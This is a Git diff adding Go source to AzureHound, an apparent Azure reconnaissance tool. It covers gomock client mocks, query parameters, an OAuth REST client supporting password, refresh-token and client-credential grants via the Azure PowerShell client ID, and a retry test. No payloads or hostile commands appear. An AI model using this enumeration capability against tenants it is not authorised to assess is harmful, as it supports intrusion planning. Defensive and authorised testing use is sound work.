mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureFunctionApps", reflect.TypeOf((*MockAzureClient)(nil).ListAzureFunctionApps), arg0, arg1) +} + +// ListAzureKeyVaults mocks base method. +func (m *MockAzureClient) ListAzureKeyVaults(arg0 context.Context, arg1 string, arg2 query.RMParams) <-chan client.AzureResult[azure.KeyVault] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureKeyVaults", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.KeyVault]) + return ret0 +} + +// ListAzureKeyVaults indicates an expected call of ListAzureKeyVaults. +func (mr *MockAzureClientMockRecorder) ListAzureKeyVaults(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureKeyVaults", reflect.TypeOf((*MockAzureClient)(nil).ListAzureKeyVaults), arg0, arg1, arg2) +} + +// ListAzureLogicApps mocks base method. +func (m *MockAzureClient) ListAzureLogicApps(arg0 context.Context, arg1, arg2 string, arg3 int32) <-chan client.AzureResult[azure.LogicApp] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureLogicApps", arg0, arg1, arg2, arg3) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.LogicApp]) + return ret0 +} + +// ListAzureLogicApps indicates an expected call of ListAzureLogicApps. +func (mr *MockAzureClientMockRecorder) ListAzureLogicApps(arg0, arg1, arg2, arg3 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureLogicApps", reflect.TypeOf((*MockAzureClient)(nil).ListAzureLogicApps), arg0, arg1, arg2, arg3) +} + +// ListAzureManagedClusters mocks base method. +func (m *MockAzureClient) ListAzureManagedClusters(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.ManagedCluster] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureManagedClusters", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ManagedCluster]) + return ret0 +} + +// ListAzureManagedClusters indicates an expected call of ListAzureManagedClusters. +func (mr *MockAzureClientMockRecorder) ListAzureManagedClusters(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureManagedClusters", reflect.TypeOf((*MockAzureClient)(nil).ListAzureManagedClusters), arg0, arg1) +} + +// ListAzureManagementGroupDescendants mocks base method. +func (m *MockAzureClient) ListAzureManagementGroupDescendants(arg0 context.Context, arg1 string, arg2 int32) <-chan client.AzureResult[azure.DescendantInfo] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureManagementGroupDescendants", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.DescendantInfo]) + return ret0 +} + +// ListAzureManagementGroupDescendants indicates an expected call of ListAzureManagementGroupDescendants. +func (mr *MockAzureClientMockRecorder) ListAzureManagementGroupDescendants(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureManagementGroupDescendants", reflect.TypeOf((*MockAzureClient)(nil).ListAzureManagementGroupDescendants), arg0, arg1, arg2) +} + +// ListAzureManagementGroups mocks base method. +func (m *MockAzureClient) ListAzureManagementGroups(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.ManagementGroup] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureManagementGroups", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ManagementGroup]) + return ret0 +} + +// ListAzureManagementGroups indicates an expected call of ListAzureManagementGroups. +func (mr *MockAzureClientMockRecorder) ListAzureManagementGroups(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureManagementGroups", reflect.TypeOf((*MockAzureClient)(nil).ListAzureManagementGroups), arg0, arg1) +} + +// ListAzureResourceGroups mocks base method. +func (m *MockAzureClient) ListAzureResourceGroups(arg0 context.Context, arg1 string, arg2 query.RMParams) <-chan client.AzureResult[azure.ResourceGroup] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureResourceGroups", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.ResourceGroup]) + return ret0 +} + +// ListAzureResourceGroups indicates an expected call of ListAzureResourceGroups. +func (mr *MockAzureClientMockRecorder) ListAzureResourceGroups(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureResourceGroups", reflect.TypeOf((*MockAzureClient)(nil).ListAzureResourceGroups), arg0, arg1, arg2) +} + +// ListAzureStorageAccounts mocks base method. +func (m *MockAzureClient) ListAzureStorageAccounts(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.StorageAccount] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureStorageAccounts", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.StorageAccount]) + return ret0 +} + +// ListAzureStorageAccounts indicates an expected call of ListAzureStorageAccounts. +func (mr *MockAzureClientMockRecorder) ListAzureStorageAccounts(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureStorageAccounts", reflect.TypeOf((*MockAzureClient)(nil).ListAzureStorageAccounts), arg0, arg1) +} + +// ListAzureStorageContainers mocks base method. +func (m *MockAzureClient) ListAzureStorageContainers(arg0 context.Context, arg1, arg2, arg3, arg4, arg5, arg6 string) <-chan client.AzureResult[azure.StorageContainer] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureStorageContainers", arg0, arg1, arg2, arg3, arg4, arg5, arg6) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.StorageContainer]) + return ret0 +} + +// ListAzureStorageContainers indicates an expected call of ListAzureStorageContainers. +func (mr *MockAzureClientMockRecorder) ListAzureStorageContainers(arg0, arg1, arg2, arg3, arg4, arg5, arg6 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureStorageContainers", reflect.TypeOf((*MockAzureClient)(nil).ListAzureStorageContainers), arg0, arg1, arg2, arg3, arg4, arg5, arg6) +} + +// ListAzureSubscriptions mocks base method. +func (m *MockAzureClient) ListAzureSubscriptions(arg0 context.Context) <-chan client.AzureResult[azure.Subscription] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureSubscriptions", arg0) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.Subscription]) + return ret0 +} + +// ListAzureSubscriptions indicates an expected call of ListAzureSubscriptions. +func (mr *MockAzureClientMockRecorder) ListAzureSubscriptions(arg0 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureSubscriptions", reflect.TypeOf((*MockAzureClient)(nil).ListAzureSubscriptions), arg0) +} + +// ListAzureVMScaleSets mocks base method. +func (m *MockAzureClient) ListAzureVMScaleSets(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.VMScaleSet] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureVMScaleSets", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.VMScaleSet]) + return ret0 +} + +// ListAzureVMScaleSets indicates an expected call of ListAzureVMScaleSets. +func (mr *MockAzureClientMockRecorder) ListAzureVMScaleSets(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureVMScaleSets", reflect.TypeOf((*MockAzureClient)(nil).ListAzureVMScaleSets), arg0, arg1) +} + +// ListAzureVirtualMachines mocks base method. +func (m *MockAzureClient) ListAzureVirtualMachines(arg0 context.Context, arg1 string, arg2 query.RMParams) <-chan client.AzureResult[azure.VirtualMachine] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureVirtualMachines", arg0, arg1, arg2) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.VirtualMachine]) + return ret0 +} + +// ListAzureVirtualMachines indicates an expected call of ListAzureVirtualMachines. +func (mr *MockAzureClientMockRecorder) ListAzureVirtualMachines(arg0, arg1, arg2 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureVirtualMachines", reflect.TypeOf((*MockAzureClient)(nil).ListAzureVirtualMachines), arg0, arg1, arg2) +} + +// ListAzureWebApps mocks base method. +func (m *MockAzureClient) ListAzureWebApps(arg0 context.Context, arg1 string) <-chan client.AzureResult[azure.WebApp] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListAzureWebApps", arg0, arg1) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.WebApp]) + return ret0 +} + +// ListAzureWebApps indicates an expected call of ListAzureWebApps. +func (mr *MockAzureClientMockRecorder) ListAzureWebApps(arg0, arg1 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListAzureWebApps", reflect.TypeOf((*MockAzureClient)(nil).ListAzureWebApps), arg0, arg1) +} + +// ListRoleAssignmentsForResource mocks base method. +func (m *MockAzureClient) ListRoleAssignmentsForResource(arg0 context.Context, arg1, arg2, arg3 string) <-chan client.AzureResult[azure.RoleAssignment] { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "ListRoleAssignmentsForResource", arg0, arg1, arg2, arg3) + ret0, _ := ret[0].(<-chan client.AzureResult[azure.RoleAssignment]) + return ret0 +} + +// ListRoleAssignmentsForResource indicates an expected call of ListRoleAssignmentsForResource. +func (mr *MockAzureClientMockRecorder) ListRoleAssignmentsForResource(arg0, arg1, arg2, arg3 interface{}) *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "ListRoleAssignmentsForResource", reflect.TypeOf((*MockAzureClient)(nil).ListRoleAssignmentsForResource), arg0, arg1, arg2, arg3) +} + +// TenantInfo mocks base method. +func (m *MockAzureClient) TenantInfo() azure.Tenant { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "TenantInfo") + ret0, _ := ret[0].(azure.Tenant) + return ret0 +} + +// TenantInfo indicates an expected call of TenantInfo. +func (mr *MockAzureClientMockRecorder) TenantInfo() *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, "TenantInfo", reflect.TypeOf((*MockAzureClient)(nil).TenantInfo)) +} diff --git a/client/query/params.go b/client/query/params.go new file mode 100644 index 0000000..3378ab5 --- /dev/null +++ b/client/query/params.go @@ -0,0 +1,170 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package query + +import ( + "strconv" + "strings" +) + +const ( + ApiVersion string = "api-version" + Count string = "$count" + Expand string = "$expand" + Filter string = "$filter" + Format string = "$format" + IncludeDeleted string = "$include" + IncludeAllTenantCategories string = "$includeAllTenantCategories" + MaxPageSize string = "$maxpagesize" + OrderBy string = "$orderby" + Recurse string = "$recurse" + Search string = "$search" + Select string = "$select" + Skip string = "$skip" + SkipToken string = "$skipToken" + StatusOnly string = "StatusOnly" + TenantId string = "tenantId" + Top string = "$top" +) + +type Params interface { + AsMap() map[string]string + NeedsEventualConsistencyHeaderFlag() bool +} + +type RMParams struct { + ApiVersion string + Expand string + Filter string + IncludeDeleted string + IncludeAllTenantCategories bool + MaxPageSize string + Recurse bool + SkipToken string + StatusOnly bool + TenantId string // For cross-tenant request + Top int32 +} + +func (s RMParams) NeedsEventualConsistencyHeaderFlag() bool { + return false +} + +func (s RMParams) AsMap() map[string]string { + params := make(map[string]string) + + if s.ApiVersion != "" { + params[ApiVersion] = s.ApiVersion + } + + if s.Expand != "" { + params[Expand] = s.Expand + } + + if s.Filter != "" { + params[Filter] = s.Filter + } + + if s.IncludeAllTenantCategories { + params[IncludeAllTenantCategories] = "true" + } + + if s.Recurse { + params[Recurse] = "true" + } + + if s.SkipToken != "" { + params[SkipToken] = s.SkipToken + } + + if s.StatusOnly { + params[StatusOnly] = "true" + } + + if s.TenantId != "" { + params[TenantId] = s.TenantId + } + if s.Top > 0 { + params[Top] = strconv.FormatInt(int64(s.Top), 10) + } + + return params +} + +type GraphParams struct { + Count bool + Expand string + Format string + Filter string + OrderBy string + Search string + Select []string + Skip int + Top int32 + SkipToken string +} + +func (s GraphParams) NeedsEventualConsistencyHeaderFlag() bool { + return s.Count || s.Search != "" || s.OrderBy != "" || (s.Filter != "" && s.OrderBy != "") || strings.Contains(s.Filter, "endsWith") +} + +func (s GraphParams) AsMap() map[string]string { + params := make(map[string]string) + + if s.Count { + params[Count] = "true" + } + + if s.Expand != "" { + params[Expand] = s.Expand + } + + if s.Format != "" { + params[Format] = s.Format + } + + if s.Filter != "" { + params[Filter] = s.Filter + } + + if s.OrderBy != "" { + params[OrderBy] = s.OrderBy + } + + if s.Search != "" { + params[Search] = s.Search + } + + if len(s.Select) > 0 { + params[Select] = strings.Join(s.Select, ",") + } + + if s.Skip > 0 { + params[Skip] = strconv.Itoa(s.Skip) + } + + if s.SkipToken != "" { + params[SkipToken] = s.SkipToken + } + + if s.Top > 0 { + params[Top] = strconv.FormatInt(int64(s.Top), 10) + } + + return params +} diff --git a/client/resource_groups.go b/client/resource_groups.go new file mode 100644 index 0000000..cff4182 --- /dev/null +++ b/client/resource_groups.go @@ -0,0 +1,42 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package client + +import ( + "context" + "fmt" + + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/models/azure" +) + +// ListAzureResourceGroups https://learn.microsoft.com/en-us/rest/api/resources/resource-groups/list?view=rest-resources-2021-04-01 +func (s *azureClient) ListAzureResourceGroups(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.ResourceGroup] { + var ( + out = make(chan AzureResult[azure.ResourceGroup]) + path = fmt.Sprintf("/subscriptions/%s/resourcegroups", subscriptionId) + ) + + if params.ApiVersion == "" { + params.ApiVersion = "2021-04-01" + } + + go getAzureObjectList[azure.ResourceGroup](s.resourceManager, ctx, path, params, out) + + return out +} diff --git a/client/rest/client.go b/client/rest/client.go new file mode 100644 index 0000000..a403190 --- /dev/null +++ b/client/rest/client.go @@ -0,0 +1,313 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package rest + +//go:generate go run go.uber.org/mock/mockgen -destination=./mocks/client.go -package=mocks . RestClient + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io" + "net/http" + "net/url" + "strconv" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client/config" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/constants" +) + +type RestClient interface { + Authenticate() error + Delete(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) + Get(ctx context.Context, path string, params query.Params, headers map[string]string) (*http.Response, error) + Patch(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) + Post(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) + Put(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) + Send(req *http.Request) (*http.Response, error) + CloseIdleConnections() +} + +func NewRestClient(apiUrl string, config config.Config) (RestClient, error) { + if auth, err := url.Parse(config.AuthorityUrl()); err != nil { + return nil, err + } else if api, err := url.Parse(apiUrl); err != nil { + return nil, err + } else if http, err := NewHTTPClient(config.ProxyUrl); err != nil { + return nil, err + } else { + client := &restClient{ + *api, + *auth, + config.JWT, + config.ApplicationId, + config.ClientSecret, + config.ClientCert, + config.ClientKey, + config.ClientKeyPass, + config.Username, + config.Password, + http, + sync.RWMutex{}, + config.RefreshToken, + config.Tenant, + Token{}, + config.SubscriptionId, + config.MgmtGroupId, + } + return client, nil + } +} + +type restClient struct { + api url.URL + authUrl url.URL + jwt string + clientId string + clientSecret string + clientCert string + clientKey string + clientKeyPass string + username string + password string + http *http.Client + mutex sync.RWMutex + refreshToken string + tenant string + token Token + subId []string + mgmtGroupId []string +} + +func (s *restClient) Authenticate() error { + var ( + path = url.URL{Path: fmt.Sprintf("/%s/oauth2/v2.0/token", s.tenant)} + endpoint = s.authUrl.ResolveReference(&path) + defaultScope = url.URL{Path: "/.default"} + scope = s.api.ResolveReference(&defaultScope) + body = url.Values{} + ) + + if s.clientId == "" { + body.Add("client_id", constants.AzPowerShellClientID) + } else { + body.Add("client_id", s.clientId) + } + + body.Add("scope", scope.ResolveReference(&defaultScope).String()) + + if s.refreshToken != "" { + body.Add("grant_type", "refresh_token") + body.Add("refresh_token", s.refreshToken) + body.Set("client_id", constants.AzPowerShellClientID) + } else if s.clientSecret != "" { + body.Add("grant_type", "client_credentials") + body.Add("client_secret", s.clientSecret) + } else if s.clientCert != "" && s.clientKey != "" { + if clientAssertion, err := NewClientAssertion(endpoint.String(), s.clientId, s.clientCert, s.clientKey, s.clientKeyPass); err != nil { + return err + } else { + body.Add("grant_type", "client_credentials") + body.Add("client_assertion_type", "urn:ietf:params:oauth:client-assertion-type:jwt-bearer") + body.Add("client_assertion", clientAssertion) + } + } else if s.username != "" && s.password != "" { + body.Add("grant_type", "password") + body.Add("username", s.username) + body.Add("password", s.password) + body.Set("client_id", constants.AzPowerShellClientID) + } else { + return fmt.Errorf("unable to authenticate. no valid credential provided") + } + + if req, err := NewRequest(context.Background(), "POST", endpoint, body, nil, nil); err != nil { + return err + } else if res, err := s.send(req); err != nil { + return err + } else { + defer res.Body.Close() + s.mutex.Lock() + defer s.mutex.Unlock() + if err := json.NewDecoder(res.Body).Decode(&s.token); err != nil { + return err + } else { + return nil + } + } +} + +func (s *restClient) Delete(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) { + endpoint := s.api.ResolveReference(&url.URL{Path: path}) + paramsMap := make(map[string]string) + if params != nil { + paramsMap = params.AsMap() + } + if req, err := NewRequest(ctx, http.MethodDelete, endpoint, body, paramsMap, headers); err != nil { + return nil, err + } else { + return s.Send(req) + } +} + +func (s *restClient) Get(ctx context.Context, path string, params query.Params, headers map[string]string) (*http.Response, error) { + endpoint := s.api.ResolveReference(&url.URL{Path: path}) + paramsMap := make(map[string]string) + + if params != nil { + paramsMap = params.AsMap() + if params.NeedsEventualConsistencyHeaderFlag() { + if headers == nil { + headers = make(map[string]string) + } + headers["ConsistencyLevel"] = "eventual" + } + } + + if req, err := NewRequest(ctx, http.MethodGet, endpoint, nil, paramsMap, headers); err != nil { + return nil, err + } else { + return s.Send(req) + } +} + +func (s *restClient) Patch(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) { + endpoint := s.api.ResolveReference(&url.URL{Path: path}) + paramsMap := make(map[string]string) + if params != nil { + paramsMap = params.AsMap() + } + if req, err := NewRequest(ctx, http.MethodPatch, endpoint, body, paramsMap, headers); err != nil { + return nil, err + } else { + return s.Send(req) + } +} + +func (s *restClient) Post(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) { + endpoint := s.api.ResolveReference(&url.URL{Path: path}) + paramsMap := make(map[string]string) + if params != nil { + paramsMap = params.AsMap() + } + if req, err := NewRequest(ctx, http.MethodPost, endpoint, body, paramsMap, headers); err != nil { + return nil, err + } else { + return s.Send(req) + } +} + +func (s *restClient) Put(ctx context.Context, path string, body interface{}, params query.Params, headers map[string]string) (*http.Response, error) { + endpoint := s.api.ResolveReference(&url.URL{Path: path}) + paramsMap := make(map[string]string) + if params != nil { + paramsMap = params.AsMap() + } + if req, err := NewRequest(ctx, http.MethodPost, endpoint, body, paramsMap, headers); err != nil { + return nil, err + } else { + return s.Send(req) + } +} + +func (s *restClient) Send(req *http.Request) (*http.Response, error) { + if s.jwt != "" { + if aud, err := ParseAud(s.jwt); err != nil { + return nil, err + } else if aud != s.api.String() { + return nil, fmt.Errorf("invalid audience") + } + req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", s.jwt)) + } else { + if s.token.IsExpired() { + if err := s.Authenticate(); err != nil { + return nil, err + } + } + req.Header.Set("Authorization", s.token.String()) + } + return s.send(req) +} + +func (s *restClient) send(req *http.Request) (*http.Response, error) { + // copy the bytes in case we need to retry the request + if body, err := CopyBody(req); err != nil { + return nil, err + } else { + var ( + res *http.Response + err error + maxRetries = 3 + ) + // Try the request up to a set number of times + for retry := 0; retry < maxRetries; retry++ { + + // Reusing http.Request requires rewinding the request body + // back to a working state + if body != nil && retry > 0 { + req.Body = io.NopCloser(bytes.NewBuffer(body)) + } + + // Try the request + if res, err = s.http.Do(req); err != nil { + if IsClosedConnectionErr(err) { + fmt.Printf("remote host force closed connection while requesting %s; attempt %d/%d; trying again\n", req.URL, retry+1, maxRetries) + ExponentialBackoff(retry) + continue + } + return nil, err + } else if res.StatusCode < http.StatusOK || res.StatusCode >= http.StatusBadRequest { + // Error response code handling + // See official Retry guidance (https://learn.microsoft.com/en-us/azure/architecture/best-practices/retry-service-specific#retry-usage-guidance) + if res.StatusCode == http.StatusTooManyRequests { + retryAfterHeader := res.Header.Get("Retry-After") + if retryAfter, err := strconv.ParseInt(retryAfterHeader, 10, 64); err != nil { + return nil, fmt.Errorf("attempting to handle 429 but unable to parse retry-after header: %w", err) + } else { + // Wait the time indicated in the retry-after header + time.Sleep(time.Second * time.Duration(retryAfter)) + continue + } + } else if res.StatusCode >= http.StatusInternalServerError { + // Wait the time calculated by the 5 second exponential backoff + ExponentialBackoff(retry) + continue + } else { + // Not a status code that warrants a retry + var errRes map[string]interface{} + if err := Decode(res.Body, &errRes); err != nil { + return nil, fmt.Errorf("malformed error response, status code: %d", res.StatusCode) + } else { + return nil, fmt.Errorf("%v", errRes) + } + } + } else { + // Response OK + return res, nil + } + } + return nil, fmt.Errorf("unable to complete the request after %d attempts: %w", maxRetries, err) + } +} + +func (s *restClient) CloseIdleConnections() { + s.http.CloseIdleConnections() +} diff --git a/client/rest/client_test.go b/client/rest/client_test.go new file mode 100644 index 0000000..4be3273 --- /dev/null +++ b/client/rest/client_test.go @@ -0,0 +1,69 @@ +// Copyright (C) 2024 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package rest + +import ( + "net/http" + "net/http/httptest" + + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/config" +) + +func TestClosedConnection(t *testing.T) { + var testServer *httptest.Server + attempt := 0 + var mockHandler http.HandlerFunc = func(w http.ResponseWriter, r *http.Request) { + attempt++ + testServer.CloseClientConnections() + } + + testServer = httptest.NewServer(mockHandler) + defer testServer.Close() + + defaultConfig := config.Config{ + Username: "azurehound", + Password: "we_collect", + Authority: testServer.URL, + } + + if client, err := NewRestClient(testServer.URL, defaultConfig); err != nil { + t.Fatalf("error initializing rest client %v", err) + } else { + requestCompleted := false + + // make request in separate goroutine so its not blocking after we validated the retry + go func() { + client.Authenticate() // Authenticate() because it uses the internal client.send method. + // CloseClientConnections should block the request from completing, however if it completes then the test fails. + requestCompleted = true + }() + + // block until attempt is > 2 or request succeeds + for attempt <= 2 { + if attempt > 1 || requestCompleted { + break + } + } + + if requestCompleted { + t.Fatalf("expected an attempted retry but the request completed") + } + } +} diff --git a/client/rest/http.go b/client/rest/http.go new file mode 100644 index 0000000..cc729fe --- /dev/null +++ b/client/rest/http.go @@ -0,0 +1,135 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package rest + +import ( + "bytes" + "context" + "crypto/tls" + "encoding/json" + "io" + "net/http" + "net/http/cookiejar" + "net/url" + "strings" + "time" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/constants" +) + +func NewHTTPClient(proxyUrl string) (*http.Client, error) { + transport := http.DefaultTransport.(*http.Transport).Clone() + transport.MaxConnsPerHost = config.ColMaxConnsPerHost.Value().(int) + transport.MaxIdleConnsPerHost = config.ColMaxIdleConnsPerHost.Value().(int) + transport.DisableKeepAlives = false + + // defaults to TLS 1.0 which is not favorable + transport.TLSClientConfig = &tls.Config{ + MinVersion: tls.VersionTLS12, + } + + // increasing timeout because tls handshakes can take longer when doing a lot of concurrent calls + transport.TLSHandshakeTimeout = 20 * time.Second + + // increasing response header timeout to accout for WAF throttling rules + transport.ResponseHeaderTimeout = 5 * time.Minute + + // ignoring err; always nil + jar, _ := cookiejar.New(nil) + + // setup forward proxy + if proxyUrl != "" { + if url, err := url.Parse(proxyUrl); err != nil { + return nil, err + } else { + transport.Proxy = http.ProxyURL(url) + } + } + + return &http.Client{ + Jar: jar, + Transport: transport, + }, nil +} + +func NewRequest( + ctx context.Context, + verb string, + endpoint *url.URL, + body interface{}, + params map[string]string, + headers map[string]string, +) (*http.Request, error) { + // set query params + if params != nil { + q := endpoint.Query() + for key, value := range params { + q.Set(key, value) + } + endpoint.RawQuery = q.Encode() + } + + // set body + var ( + reader io.Reader + buffer = &bytes.Buffer{} + ) + if body != nil { + switch body := body.(type) { + case url.Values: + reader = strings.NewReader(body.Encode()) + default: + data := new(bytes.Buffer) + if err := json.NewEncoder(data).Encode(body); err != nil { + return nil, err + } else { + reader = data + } + } + buffer.ReadFrom(reader) + } + + if req, err := http.NewRequestWithContext(ctx, verb, endpoint.String(), buffer); err != nil { + return nil, err + } else { + // set headers + for key, value := range headers { + req.Header.Set(key, value) + } + + // set content-type + if body != nil { + switch body.(type) { + case url.Values: + req.Header.Set("Content-Type", "application/x-www-form-urlencoded") + default: + req.Header.Set("Content-Type", "application/json") + } + } + + // set default accept type + if req.Header.Get("Accept") == "" { + req.Header.Set("Accept", "application/json") + } + + // set azurehound as user-agent + req.Header.Set("User-Agent", constants.UserAgent()) + return req, nil + } +} diff --git a/client/rest/mocks/client.go b/client/rest/mocks/client.go new file mode 100644 index 0000000..6c2f7ae --- /dev/null +++ b/client/rest/mocks/client.go @@ -0,0 +1,153 @@ +// Code generated by MockGen. DO NOT EDIT. +// Source: github.com/bloodhoundad/azurehound/v2/client/rest (interfaces: RestClient) + +// Package mocks is a generated GoMock package. +package mocks + +import ( + context "context" + http "net/http" + reflect "reflect" + + query "github.com/bloodhoundad/azurehound/v2/client/query" + gomock "go.uber.org/mock/gomock" +) + +// MockRestClient is a mock of RestClient interface. +type MockRestClient struct { + ctrl *gomock.Controller + recorder *MockRestClientMockRecorder +} + +// MockRestClientMockRecorder is the mock recorder for MockRestClient. +type MockRestClientMockRecorder struct { + mock *MockRestClient +} + +// NewMockRestClient creates a new mock instance. +func NewMockRestClient(ctrl *gomock.Controller) *MockRestClient { + mock := &MockRestClient{ctrl: ctrl} + mock.recorder = &MockRestClientMockRecorder{mock} + return mock +} + +// EXPECT returns an object that allows the caller to indicate expected use. +func (m *MockRestClient) EXPECT() *MockRestClientMockRecorder { + return m.recorder +} + +// Authenticate mocks base method. +func (m *MockRestClient) Authenticate() error { + m.ctrl.T.Helper() + ret := m.ctrl.Call(m, "Authenticate") + ret0, _ := ret[0].(error) + return ret0 +} + +// Authenticate indicates an expected call of Authenticate. +func (mr *MockRestClientMockRecorder) Authenticate() *gomock.Call { + mr.mock.ctrl.T.Helper() + return mr.mock.ctrl.RecordCallWithMethodType(mr.mock, 